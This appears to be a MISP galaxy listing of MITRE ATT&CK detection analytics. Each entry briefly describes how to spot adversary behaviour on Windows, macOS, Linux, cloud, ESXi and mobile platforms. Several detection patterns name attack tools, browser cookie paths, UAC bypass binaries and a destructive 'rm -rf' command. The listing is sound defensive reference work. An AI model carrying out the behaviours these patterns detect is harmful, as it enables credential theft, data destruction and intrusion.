UUID d1d19568-2b59-4d44-9744-22d7304d2200 which can be used as unique global reference for Analytic 1038 - AN1038 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1038
mitre_platforms ['Linux']

Analytic 0831 - AN0831

Detects adversarial archiving using built-in or third-party utilities (makecab, diantz, xcopy, certutil, 7z, WinRAR, WinZip). Correlates suspicious process creation events with command-line arguments for compression/encoding, followed by creation of archive files (.cab, .zip, .7z, .rar). Identifies anomalous loading of crypt32.dll for encryption operations or execution of diantz.exe to compress remotely staged files.

Internal MISP references

UUID ebfa3aa8-dc7c-4d56-868e-169c873b5e78 which can be used as unique global reference for Analytic 0831 - AN0831 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0831
mitre_platforms ['Windows']

Analytic 1803 - AN1803

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID a8133527-5402-49e0-a9f1-14ee4fb2dd3f which can be used as unique global reference for Analytic 1803 - AN1803 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1803
mitre_platforms ['iOS']

Analytic 1830 - AN1830

Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID f10a7842-ddb2-488b-93ac-e53fa6476614 which can be used as unique global reference for Analytic 1830 - AN1830 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1830
mitre_platforms ['iOS']

Analytic 1093 - AN1093

Detects anomalous ARP cache changes and unsolicited ARP broadcasts using unified logs and packet capture. Behavioral detection includes multiple IP addresses mapped to the same MAC address and repeated gratuitous ARP traffic.

Internal MISP references

UUID 0f996058-7524-4759-9d88-a8997e90ff3c which can be used as unique global reference for Analytic 1093 - AN1093 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1093
mitre_platforms ['macOS']

Analytic 0913 - AN0913

Detects the presence of executables with high NOP padding, unusually large binary size for their function, and follow-on execution or memory injection from such files, especially when originating from temp or user-space paths.

Internal MISP references

UUID 2ae1dd34-c666-488f-8ad6-752b8a6acae1 which can be used as unique global reference for Analytic 0913 - AN0913 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0913
mitre_platforms ['Windows']

Analytic 0193 - AN0193

Phishing delivered via SaaS services (chat, collaboration platforms) where messages contain malicious URLs or attachments. Detect anomalous link clicks, suspicious file uploads, or token misuse after SaaS-based phishing attempts.

Internal MISP references

UUID 4da63d13-d9bb-41c6-88c8-31bc9f2579fb which can be used as unique global reference for Analytic 0193 - AN0193 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0193
mitre_platforms ['SaaS']

Analytic 1309 - AN1309

Correlates creation of email forwarding rules or header anomalies (e.g., X-MS-Exchange-Organization-AutoForwarded) with suspicious process execution, file access of .pst/.ost files, and network connections to external SMTP servers.

Internal MISP references

UUID 4f15b707-9b44-4716-bfcd-e3f28659077b which can be used as unique global reference for Analytic 1309 - AN1309 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1309
mitre_platforms ['Windows']

Analytic 0139 - AN0139

Creation or modification of files in directories known to be excluded from AV scanning (e.g., C:\Windows\Temp, Exchange server directories, or default AV exclusions). Defender perspective: correlate file creation with execution behavior or anomalous parent processes writing to excluded paths.

Internal MISP references

UUID 620cae28-1874-462d-a2e4-47ddd75098ea which can be used as unique global reference for Analytic 0139 - AN0139 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0139
mitre_platforms ['Windows']

Analytic 0931 - AN0931

Remote Desktop (RDP) logon by a user followed by unusual process execution, file access, or lateral movement activity within a short timeframe.

Internal MISP references

UUID 63fcb4be-f5c2-47da-951d-cd1b4f1a2cc0 which can be used as unique global reference for Analytic 0931 - AN0931 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0931
mitre_platforms ['Windows']

Analytic 0319 - AN0319

Detects use of dscl or id/group commands to enumerate local system groups, often by post-exploitation tools or persistence checks.

Internal MISP references

UUID 66923fbc-1d4d-4945-89dd-102a8e2c6122 which can be used as unique global reference for Analytic 0319 - AN0319 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0319
mitre_platforms ['macOS']

Analytic 1039 - AN1039

Detect unauthorized trap command registrations in shell startup files (e.g., .zprofile, .bash_profile, .zshrc) followed by execution chains during user terminal interaction. Use Unified Logs and EDR telemetry to correlate shell command parsing and process tree anomalies.

Internal MISP references

UUID 99c42b1f-1716-413b-8c23-5f7e1d997ab2 which can be used as unique global reference for Analytic 1039 - AN1039 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1039
mitre_platforms ['macOS']

Analytic 0391 - AN0391

Detects DYLD_INSERT_LIBRARIES abuse to hook credential-sensitive applications by correlating process spawns with unauthorized library injection and monitoring changes to the __TEXT segment (code) of credential handling binaries.

Internal MISP references

UUID b8141218-1f71-4b65-a611-7c9c55038c4c which can be used as unique global reference for Analytic 0391 - AN0391 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0391
mitre_platforms ['macOS']

Analytic 1390 - AN1390

Detects command-line utilities or scripts using encryption libraries or symmetric algorithms (e.g., OpenSSL AES, GPG, Python + PyCrypto) in conjunction with outbound file transfers or traffic to external destinations.

Internal MISP references

UUID d8978977-d2c8-4c1c-a6c1-0176330e3446 which can be used as unique global reference for Analytic 1390 - AN1390 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1390
mitre_platforms ['Linux']

Analytic 1404 - AN1404

Detects unauthorized access to browser cookie paths (e.g., ~/Library/Application Support/Google/Chrome/Default/Cookies) or task_for_pid/vm_read calls to Safari/Chrome memory space.

Internal MISP references

UUID 3fdd7ef4-b382-4880-9f72-bf0ad696af85 which can be used as unique global reference for Analytic 1404 - AN1404 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1404
mitre_platforms ['macOS']

Analytic 0144 - AN0144

Detects excessive outbound traffic to remote host over HTTP(S) from uncommon or previously unseen processes.

Internal MISP references

UUID 79c7d394-e772-479c-acf9-ddd05b8a68b9 which can be used as unique global reference for Analytic 0144 - AN0144 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0144
mitre_platforms ['Windows']

Analytic 0441 - AN0441

Unusual screensaver (.scr) executions correlated with recent registry modifications to HKCU\Control Panel\Desktop values such as SCRNSAVE.exe, ScreenSaveTimeout, and ScreenSaveActive. Detection focuses on PE image paths not consistent with known legitimate screensavers and triggered after user inactivity timeout.

Internal MISP references

UUID 86dbac4c-1cba-4056-84a1-604eefbb11ac which can be used as unique global reference for Analytic 0441 - AN0441 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0441
mitre_platforms ['Windows']

Analytic 1044 - AN1044

Execution of file discovery commands (e.g., 'dir', 'show flash', 'nvram:') from CLI interfaces, especially by unauthorized users or from abnormal source IPs.

Internal MISP references

UUID be6e5f23-0e29-430f-83f7-d76c58de3a2d which can be used as unique global reference for Analytic 1044 - AN1044 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1044
mitre_platforms ['Network Devices']

Analytic 0414 - AN0414

Adversary deletes critical infrastructure: EC2 instances, S3 buckets, snapshots, or volumes using elevated IAM credentials. Frequently includes batch API calls with Delete* or TerminateInstances.

Internal MISP references

UUID c6f35e44-459c-456b-97a7-997eb2baefb9 which can be used as unique global reference for Analytic 0414 - AN0414 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0414
mitre_platforms ['IaaS']

Analytic 1440 - AN1440

Detects suspicious use of PowerShell, .NET, or script interpreters to spawn processes that mimic UAC prompts, often with credential capture dialogue boxes invoked from non-standard parent processes.

Internal MISP references

UUID ea127140-2f66-4c3d-93ab-215c210ad6c5 which can be used as unique global reference for Analytic 1440 - AN1440 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1440
mitre_platforms ['Windows']

Analytic 0145 - AN0145

Identifies custom or previously unseen userland processes initiating high-volume HTTP connections with low response volume.

Internal MISP references

UUID 07deb060-c373-4059-b73b-736688a25c80 which can be used as unique global reference for Analytic 0145 - AN0145 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0145
mitre_platforms ['Linux']

Analytic 0451 - AN0451

Detect repeated failed login events followed by MFA challenges triggered in rapid succession, especially if originating from service accounts or anomalous IP addresses.

Internal MISP references

UUID 2c0df764-d9bd-4a91-808a-aa13df13511a which can be used as unique global reference for Analytic 0451 - AN0451 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0451
mitre_platforms ['Windows']

Analytic 0514 - AN0514

CLI tools (smbclient -L, smbmap, rpcclient, nmblookup) or custom scripts enumerate SMB shares on many internal hosts → corresponding SMB connections (445/139) captured by Zeek/Netflow within a short window.

Internal MISP references

UUID 2de35397-ef03-4ffe-b531-d7ad61a6f41d which can be used as unique global reference for Analytic 0514 - AN0514 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0514
mitre_platforms ['Linux']

Analytic 1450 - AN1450

Remote knock sequence followed by PF/socketfilterfw rule update or a background process listening on a new port; then a successful TCP session. Also flags WoL magic packets on local segment.

Internal MISP references

UUID 48d2effa-7fc0-4790-9cc9-bbe573c29301 which can be used as unique global reference for Analytic 1450 - AN1450 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1450
mitre_platforms ['macOS']

Analytic 0541 - AN0541

Detection of anti-malware quarantining or flagging a tool, followed by a new binary written to disk with a similar function or name and a resumed process chain.

Internal MISP references

UUID 66bab948-9baa-4f5c-b259-333eb2ac08ad which can be used as unique global reference for Analytic 0541 - AN0541 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0541
mitre_platforms ['Linux']

Analytic 1540 - AN1540

Identify use of 'shutdown', 'reboot', or 'osascript' system shutdown invocations within unified logs and track unexpected shutdown sequences initiated by GUI or script. Cross-reference with user activity or absence thereof.

Internal MISP references

UUID 6b11c208-4dbf-4d52-9254-524e622c6250 which can be used as unique global reference for Analytic 1540 - AN1540 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1540
mitre_platforms ['macOS']

Analytic 0154 - AN0154

Detection of unexpected additions or modifications to system-wide certificate stores or execution of commands adding certificates to trusted stores.

Internal MISP references

UUID 759c073c-2c40-484b-af47-8426ec5d5a3e which can be used as unique global reference for Analytic 0154 - AN0154 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0154
mitre_platforms ['Linux']

Analytic 1405 - AN1405

Detects automation macros or VBA scripts in documents that access browser file paths, read cookie data, or attempt to exfiltrate browser session tokens over HTTP.

Internal MISP references

UUID 916993bd-600a-43e2-abbf-30c56be84459 which can be used as unique global reference for Analytic 1405 - AN1405 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1405
mitre_platforms ['Office Suite']

Analytic 0415 - AN0415

Adversary destroys virtual disks (VMDK), images, or VMs by invoking vim-cmd, deleting datastore contents, or purging snapshots.

Internal MISP references

UUID 9ea1e329-691a-43a7-b56d-affbc00fb9e7 which can be used as unique global reference for Analytic 0415 - AN0415 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0415
mitre_platforms ['ESXi']

Analytic 1045 - AN1045

Monitor for suspicious use of Windows API calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or processes manually checking the BeingDebugged flag in the Process Environment Block (PEB). Detect sequences of OutputDebugStringW() calls in short intervals that may indicate debugger flooding attempts.

Internal MISP references

UUID d5f0b652-3699-45af-97e6-81e7426558bd which can be used as unique global reference for Analytic 1045 - AN1045 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1045
mitre_platforms ['Windows']

Analytic 1054 - AN1054

Monitor for creation of new Power Automate flows or equivalent automation scripts that trigger on user or file events. Detect anomalous actions performed by these automations, such as email forwarding, anonymous link creation, or unexpected API calls to external endpoints.

Internal MISP references

UUID f8787a86-552b-4e03-8d68-7177001a215d which can be used as unique global reference for Analytic 1054 - AN1054 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1054
mitre_platforms ['Office Suite']

Analytic 1504 - AN1504

Detects cloud account use for API calls that exceed normal scope, such as IAM changes or access to services never used before.

Internal MISP references

UUID fc507123-4267-4cf8-9e30-a90a89043b20 which can be used as unique global reference for Analytic 1504 - AN1504 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1504
mitre_platforms ['IaaS']

Analytic 1460 - AN1460

Detects use of macOS-native archiving or encryption tools (zip, ditto, hdiutil) for staging collected data. Identifies unexpected invocation of archive utilities by Office apps, browsers, or background daemons. Correlates file creation of .zip/.dmg containers with process lineage anomalies.

Internal MISP references

UUID 0f4789c9-7946-473f-967b-e8ca59fa3c8c which can be used as unique global reference for Analytic 1460 - AN1460 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1460
mitre_platforms ['macOS']

Analytic 0164 - AN0164

Detect manipulation of system or application files in /Library, /System, or user data directories using FSEvents and Unified Logs. Identify anomalous process execution modifying plist files, structured data, or logs outside expected update cycles.

Internal MISP references

UUID 13f8d339-8239-4d84-adf2-1abf1a0f3d5d which can be used as unique global reference for Analytic 0164 - AN0164 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0164
mitre_platforms ['macOS']

Analytic 1640 - AN1640

SSH login via hostd or /var/log/auth.log, followed by CLI access to host shell or file manipulation in restricted areas.

Internal MISP references

UUID 1b6eaec8-141f-44f8-ae1f-387c44635c38 which can be used as unique global reference for Analytic 1640 - AN1640 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1640
mitre_platforms ['ESXi']

Analytic 1064 - AN1064

Correlates script execution or suspicious parent processes with creation or modification of encoded, compressed, or encrypted file formats (e.g., .zip, .7z, .enc) and abnormal command-line syntax or PowerShell obfuscation.

Internal MISP references

UUID 1dee558e-720e-4f3b-9414-192a63eb8909 which can be used as unique global reference for Analytic 1064 - AN1064 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1064
mitre_platforms ['Windows']

Analytic 1604 - AN1604

Adversary uses built-in OS tools or API calls to create local or domain accounts for persistence or lateral movement. Tools such as 'net user', PowerShell, or MMC snap-ins may be used. Detection focuses on Event ID 4720 paired with process lineage and user context.

Internal MISP references

UUID 33d574c3-8e9b-462d-b3d1-09e64c2fa8c7 which can be used as unique global reference for Analytic 1604 - AN1604 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1604
mitre_platforms ['Windows']

Analytic 1406 - AN1406

Detects use of session cookies or authentication tokens from unusual user agents or locations. Identifies token reuse without reauthentication or attempts to bypass MFA using previously stolen cookies.

Internal MISP references

UUID 5e1d71ce-5653-4580-a609-9832c88e2c87 which can be used as unique global reference for Analytic 1406 - AN1406 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1406
mitre_platforms ['SaaS']

Analytic 0416 - AN0416

Container process executes destructive file operations inside volume mounts or host paths. Includes rm -rf /mnt/volumes/, container breakout followed by host deletion attempts.

Internal MISP references

UUID 7735a0b1-f3bc-44fc-a909-75738e77bded which can be used as unique global reference for Analytic 0416 - AN0416 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0416
mitre_platforms ['Containers']

Analytic 0614 - AN0614

Detection of Windows container escape attempts by observing processes accessing host directories, symbolic link abuse, or privilege escalation attempts. Defenders may detect anomalous process execution with access to system-level directories outside of container boundaries.

Internal MISP references

UUID 81e2b983-2159-47d1-9ec1-a5c863faa1a7 which can be used as unique global reference for Analytic 0614 - AN0614 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0614
mitre_platforms ['Windows']

Analytic 0641 - AN0641

Enumeration of global address lists or email account metadata via PowerShell cmdlets (e.g., Get-GlobalAddressList) or MAPI/RPC from non-admin, non-mailserver systems.

Internal MISP references

UUID cd91348f-296f-4007-a853-6d06d8175210 which can be used as unique global reference for Analytic 0641 - AN0641 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0641
mitre_platforms ['Windows']

Analytic 0461 - AN0461

Chain: (1) privileged CLI sessions run read-only commands that dump AAA/password policies (e.g., show aaa, show password-policy); (2) same account changes AAA or user DB shortly after. Use network device AAA/command accounting or syslog.

Internal MISP references

UUID d93312e3-210a-4757-b638-4ed19fca8621 which can be used as unique global reference for Analytic 0461 - AN0461 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0461
mitre_platforms ['Network Devices']

Analytic 0146 - AN0146

Flags unexpected user applications initiating long-lived HTTP(S) sessions with irregular traffic patterns.

Internal MISP references

UUID dc87f086-1764-43c2-a7bf-1a5ba2ea8191 which can be used as unique global reference for Analytic 0146 - AN0146 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0146
mitre_platforms ['macOS']

Analytic 1046 - AN1046

Monitor access to /proc/self/status where TracerPID field is queried, as this is a common technique for debugger detection. Detect processes that attempt to trigger exceptions intentionally and monitor whether exception handling indicates presence of a debugger.

Internal MISP references

UUID e4a9dd91-3354-40c8-a55c-941d53f2ddec which can be used as unique global reference for Analytic 1046 - AN1046 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1046
mitre_platforms ['Linux']

Analytic 0417 - AN0417

Adversary gains access to cloud-hosted services such as AWS SES, SNS, or OpenAI API, enables or modifies usage policies, and initiates resource-intensive actions (e.g., mass email/SMS or LLM queries), often from unauthorized regions or under anomalous identity conditions.

Internal MISP references

UUID 01967eb2-5169-4113-aff0-ac2180fd14d9 which can be used as unique global reference for Analytic 0417 - AN0417 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0417
mitre_platforms ['SaaS']

Analytic 1074 - AN1074

Adversaries accessing datastore or configuration files via vim-cmd, esxcli, or SCP to extract logs, VMs, or host configurations.

Internal MISP references

UUID 0abb4122-0795-46ef-b162-7570db42596a which can be used as unique global reference for Analytic 1074 - AN1074 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1074
mitre_platforms ['ESXi']

Analytic 0147 - AN0147

Sequence of internal email sent from a recently compromised user account (preceded by abnormal logon or device activity), with attachments or links leading to execution or credential harvesting. Defender observes: internal mail delivery to peers with high entropy attachments, followed by click events, process initiation, or credential prompts.

Internal MISP references

UUID 0bf5b548-50d0-4e73-bb3c-413cbdfafd97 which can be used as unique global reference for Analytic 0147 - AN0147 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0147
mitre_platforms ['Windows']

Analytic 1407 - AN1407

Detects suspicious SVG file creation or download events followed by script engine execution (e.g., wscript.exe, mshta.exe, rundll32.exe), network callbacks, or browser-based credential collection.

Internal MISP references

UUID 288a28ac-e1e4-4e7e-9156-d3b975ed45ed which can be used as unique global reference for Analytic 1407 - AN1407 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1407
mitre_platforms ['Windows']

Analytic 0174 - AN0174

Detects Python execution from non-standard user contexts or cron jobs that invoke outbound traffic, access sensitive files, or perform process injection (e.g., ptrace or /proc memory maps).

Internal MISP references

UUID 59354e08-ed82-4b95-99c5-aed3996473e1 which can be used as unique global reference for Analytic 0174 - AN0174 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0174
mitre_platforms ['Linux']

Analytic 0471 - AN0471

Detects use of clear history or clear logging commands on network device CLI to remove past activity logs.

Internal MISP references

UUID 7879313f-abf1-487a-b4d3-813f385ddce3 which can be used as unique global reference for Analytic 0471 - AN0471 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0471
mitre_platforms ['Network Devices']

Analytic 0741 - AN0741

Persistent high CPU utilization combined with suspicious command-line execution (e.g., mining tools or obfuscated scripts) and outbound connections to mining/proxy networks.

Internal MISP references

UUID a789e535-cab9-49b4-9685-c10a5d3642b4 which can be used as unique global reference for Analytic 0741 - AN0741 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0741
mitre_platforms ['Windows']

Analytic 1470 - AN1470

Cloud API usage to create/import SSH keys or generate new access keys (CreateAccessKey, ImportKeyPair, CreateLoginProfile) from non-console access or unusual principals.

Internal MISP references

UUID b31afcb5-1690-43f1-acbb-3e2936e48616 which can be used as unique global reference for Analytic 1470 - AN1470 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1470
mitre_platforms ['IaaS']

Analytic 1047 - AN1047

Detect suspicious calls to sysctl or ptrace API used to determine if a process is being debugged. Monitor for processes that flood OutputDebugString equivalents or generate abnormal exceptions to evade analysis.

Internal MISP references

UUID c78d2e09-07d7-48ef-add1-bde622e502a2 which can be used as unique global reference for Analytic 1047 - AN1047 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1047
mitre_platforms ['macOS']

Analytic 0714 - AN0714

Adversary installation or use of RMM software (e.g., TeamViewer, AnyDesk, ScreenConnect) followed by outbound beaconing or remote session establishment

Internal MISP references

UUID fe1e10ae-ddd2-40f0-8e62-3db88c0c8c68 which can be used as unique global reference for Analytic 0714 - AN0714 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0714
mitre_platforms ['Windows']

Analytic 1740 - AN1740

On Android, Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android's SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromise devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices.

Internal MISP references

UUID 007a370c-be77-49c9-9ca3-25d50de35864 which can be used as unique global reference for Analytic 1740 - AN1740 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1740
mitre_platforms ['iOS']

Analytic 1704 - AN1704

Application vetting services could look for misuse of dynamic libraries.

Internal MISP references

UUID 166d394c-6d24-46d3-866e-4f57ca849e90 which can be used as unique global reference for Analytic 1704 - AN1704 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1704
mitre_platforms ['iOS']

Analytic 0184 - AN0184

Adversary installs or modifies IIS components (ISAPI filters, extensions, or modules) using DLL files registered via configuration changes or administrative tools like AppCmd.exe. These components intercept or manipulate HTTP requests/responses for persistence or C2.

Internal MISP references

UUID 09ef4725-8e20-452d-b08c-f7db3cbee174 which can be used as unique global reference for Analytic 0184 - AN0184 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0184
mitre_platforms ['Windows']

Analytic 0841 - AN0841

Execution of files originating from removable media after drive mount, with correlation to file write activity, autorun usage, or lateral spread via staged tools.

Internal MISP references

UUID 12c748a0-3ce9-4fd2-8a65-f4362b69cafd which can be used as unique global reference for Analytic 0841 - AN0841 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0841
mitre_platforms ['Windows']

Analytic 1048 - AN1048

Correlated use of sleep/delay mechanisms (e.g., kernel32!Sleep, NTDLL APIs) in short-lived processes, combined with parent processes invoking suspicious scripts (e.g., wscript, powershell) with minimal user interaction.

Internal MISP references

UUID 28e26a6a-e470-4f1c-845f-f2cbd816a1f7 which can be used as unique global reference for Analytic 1048 - AN1048 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1048
mitre_platforms ['Windows']

Analytic 1084 - AN1084

Detects Unix shell usage on network appliances (e.g., routers, firewalls, embedded Linux) through rare console commands, CLI interfaces, or script injection via exposed APIs or SSH.

Internal MISP references

UUID 2adf0c92-5d0a-459d-affc-f4abd4d406d0 which can be used as unique global reference for Analytic 1084 - AN1084 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1084
mitre_platforms ['Network Devices']

Analytic 0814 - AN0814

Detects injection or tampering of DLLs in hybrid identity agents (e.g., AzureADConnectAuthenticationAgentService), registry or configuration changes tied to PTA/AD FS, and anomalous LSASS or AD FS module loads correlated with authentication anomalies.

Internal MISP references

UUID 344f0add-d372-4e0e-88c6-f48e6b424434 which can be used as unique global reference for Analytic 0814 - AN0814 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0814
mitre_platforms ['Windows']

Analytic 0418 - AN0418

Forged SAML tokens can be observed as authentication attempts with valid signatures but missing expected preceding Kerberos or authentication events. Defenders may correlate SAML assertions with absent Event IDs 4769, 1200, or 1202, or tokens issued with abnormal lifetimes, issuers, or claims compared to baseline.

Internal MISP references

UUID 3cb835e5-ded1-42c4-a5cc-38911078b0a5 which can be used as unique global reference for Analytic 0418 - AN0418 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0418
mitre_platforms ['Identity Provider']

Analytic 1408 - AN1408

Detects downloaded SVG files followed by execution of browser processes or tools like xdg-open, and rapid follow-on network connections or process spawns to interpreters like python or bash.

Internal MISP references

UUID 99bfd95b-256a-4b1d-bf1d-481f47642c15 which can be used as unique global reference for Analytic 1408 - AN1408 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1408
mitre_platforms ['Linux']

Analytic 1480 - AN1480

1) New or updated software is delivered/installed from atypical sources or with signature/hash mismatches; 2) installer/updater writes binaries to unexpected paths or replaces existing signed files; 3) first run causes unsigned/abnormally signed modules to load or child processes to execute, optionally followed by network egress to new destinations.

Internal MISP references

UUID a6b1e74e-6c05-4d9f-928c-63ddf558798b which can be used as unique global reference for Analytic 1480 - AN1480 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1480
mitre_platforms ['Windows']

Analytic 0481 - AN0481

Defenders should monitor for suspicious enumeration of cloud infrastructure components via APIs or CLI tools. Observable behaviors include repeated listing or description operations for compute instances, snapshots, storage buckets, and volumes. From a defender’s perspective, risky activity is often identified by new or untrusted identities making discovery calls (e.g., DescribeInstances, ListBuckets, az vm list, gcloud compute instances list), enumeration from unusual geolocations or IPs, or rapid multi-service discovery in sequence. Correlating discovery API usage with later snapshot creation or instance modification provides further context of adversary behavior.

Internal MISP references

UUID a9372c6a-8d3b-420a-ad9d-8ef8d284205f which can be used as unique global reference for Analytic 0481 - AN0481 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0481
mitre_platforms ['IaaS']

Analytic 0148 - AN0148

Delivery of suspicious internal communication (e.g., Thunderbird, Evolution) using compromised internal accounts. Sequence of: unexpected user activity + mail transfer logs + download or execution of attachments.

Internal MISP references

UUID b5b53b9d-f72b-4cd5-946b-d1ddfdad3c0f which can be used as unique global reference for Analytic 0148 - AN0148 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0148
mitre_platforms ['Linux']

Analytic 1804 - AN1804

Mobile security products can typically detect rooted devices, which is an indication that Process Discovery is possible. Application vetting could potentially detect when applications attempt to abuse root access or root the system itself. Further, application vetting services could look for attempted usage of legacy process discovery mechanisms, such as the usage of ps or inspection of the /proc directory.

Internal MISP references

UUID 5c5225c4-2d35-431e-830d-ea1cc649c6ba which can be used as unique global reference for Analytic 1804 - AN1804 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1804
mitre_platforms ['Android']

Analytic 1840 - AN1840

Accessing data from the local system can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 983ae9ea-a125-498a-862d-00d5bed2087a which can be used as unique global reference for Analytic 1840 - AN1840 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1840
mitre_platforms ['Android']

Analytic 0491 - AN0491

Flood of incoming TLS or HTTP(S) connections to macOS-hosted services (e.g., MAMP, Apache), causing high CPU usage and system unresponsiveness.

Internal MISP references

UUID 00bf6b2e-444a-4a83-aafd-43bc8eea4594 which can be used as unique global reference for Analytic 0491 - AN0491 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0491
mitre_platforms ['macOS']

Analytic 1094 - AN1094

Detects a multi-event behavior chain involving UAC bypass attempts via known auto-elevated binaries (e.g., eventvwr.exe, sdclt.exe), unauthorized Registry changes to UAC-related keys, and anomalous process execution with elevated privileges but lacking standard parent-child lineage. Suspicious patterns include invocation of auto-elevated COM objects or manipulation of isolatedCommand Registry entries without consent prompts.

Internal MISP references

UUID 13a875c4-87d2-448e-a46e-970e1f9ad5da which can be used as unique global reference for Analytic 1094 - AN1094 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1094
mitre_platforms ['Windows']

Analytic 1940 - AN1940

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).

Internal MISP references

UUID 193167de-400a-4ea3-a8db-93e4bf628068 which can be used as unique global reference for Analytic 1940 - AN1940 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1940
mitre_platforms ['PRE']

